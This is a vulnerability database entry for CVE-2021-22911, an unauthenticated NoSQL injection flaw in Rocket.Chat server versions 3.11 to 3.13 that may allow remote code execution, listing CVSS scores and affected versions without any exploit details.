CVE Vulnerabilities

CVE-2021-22911

Failure to Sanitize Special Elements into a Different Plane (Special Element Injection)

Published: May 27, 2021 | Modified: Nov 21, 2024
CVSS 3.x
9.8
CRITICAL
Source:
NVD
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS 2.x
7.5 HIGH
AV:N/AC:L/Au:N/C:P/I:P/A:P
RedHat/V2
RedHat/V3
Ubuntu

A improper input sanitization vulnerability exists in Rocket.Chat server 3.11, 3.12 & 3.13 that could lead to unauthenticated NoSQL injection, resulting potentially in RCE.

Weakness

The product does not adequately filter user-controlled input for special elements with control implications.

Affected Software

Name Vendor Start Version End Version
Rocket.chat Rocket.chat 3.11.0 (including) 3.11.0 (including)
Rocket.chat Rocket.chat 3.12.0 (including) 3.12.0 (including)
Rocket.chat Rocket.chat 3.13.0 (including) 3.13.0 (including)

Potential Mitigations

References